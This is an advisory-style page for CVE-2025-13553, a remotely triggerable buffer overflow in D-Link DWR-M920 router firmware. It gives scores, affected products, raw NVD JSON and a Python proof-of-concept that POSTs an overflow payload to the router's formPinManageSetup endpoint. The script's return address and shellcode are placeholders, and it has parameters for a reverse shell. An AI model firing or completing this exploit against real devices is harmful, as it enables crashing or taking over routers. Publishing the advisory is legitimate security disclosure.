Security Vulnerability Report
中文
CVE-2025-13553 CVSS 8.8 HIGH

CVE-2025-13553

Published: 2025-11-23 14:15:47
Last Modified: 2025-11-26 17:22:52
Source: [email protected]

Description

A weakness has been identified in D-Link DWR-M920 1.1.50. This affects the function sub_41C7FC of the file /boafrm/formPinManageSetup. This manipulation of the argument submit-url causes buffer overflow. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be exploited.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dlink:dwr-m920_firmware:1.1.50:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dlink:dwr-m920:-:*:*:*:*:*:*:* - NOT VULNERABLE
D-Link DWR-M920 < 1.1.50 (固件版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-13553 PoC - D-Link DWR-M920 Buffer Overflow Dork: DWR-M920 formPinManageSetup buffer overflow """ import requests import sys import argparse def exploit_dwr_m920(target_ip, target_port=80, lhost=None, lport=4444): """ Exploit buffer overflow in /boafrm/formPinManageSetup target: Target IP address lhost: Attacker IP for reverse shell (optional) lport: Attacker port for reverse shell (optional) """ url = f"http://{target_ip}:{target_port}/boafrm/formPinManageSetup" # Buffer overflow payload construction # Pattern: padding + return address + nop sled + shellcode buffer_size = 1000 # Generate cyclic pattern for offset calculation # In real exploitation, use pattern_create and pattern_offset padding = b'A' * 500 # Return address (needs to be adjusted based on firmware version) # For 1.1.50, use gadgets from libc or firmware binary ret_addr = b'\x42\x42\x42\x42' # Placeholder - needs to point to shellcode # NOP sled for reliability nop_sled = b'\x90' * 100 # Simple execve /bin/sh shellcode for MIPS (little-endian) # This is a placeholder - use msfvenom for actual MIPS shellcode shellcode = b'\x66\x66\x66\x66' # Placeholder shellcode payload = padding + ret_addr + nop_sled + shellcode # Send malicious request data = { 'submit-url': payload.decode('latin-1'), 'submit-button': 'save' } print(f"[*] Sending exploit to {url}") print(f"[*] Payload size: {len(payload)} bytes") try: response = requests.post(url, data=data, timeout=10) print(f"[!] Response status: {response.status_code}") print(f"[!] Target may be vulnerable - check for crash or shell") except requests.exceptions.Timeout: print("[!] Request timed out - likely crashed the service") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2025-13553 Exploit') parser.add_argument('target', help='Target IP address') parser.add_argument('-p', '--port', default=80, help='Target port (default: 80)') args = parser.parse_args() exploit_dwr_m920(args.target, args.port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13553", "sourceIdentifier": "[email protected]", "published": "2025-11-23T14:15:46.510", "lastModified": "2025-11-26T17:22:51.500", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in D-Link DWR-M920 1.1.50. This affects the function sub_41C7FC of the file /boafrm/formPinManageSetup. This manipulation of the argument submit-url causes buffer overflow. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dwr-m920_firmware:1.1.50:*:*:*:*:*:*:*", "matchCriteriaId": "2C932664-064A-41BC-92E2-174EB65427C6"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dwr-m920:-:*:*:*:*:*:*:*", "matchCriteriaId": "E815EF72-10FC-43A4-84A7-A25ABE7A4640"}]}]}], "references": [{"url": "https://github.com/QIU-DIE/CVE/issues/45", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.333320", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.333320", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.695435", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.dlink.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/QIU-DIE/CVE/issues/45", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.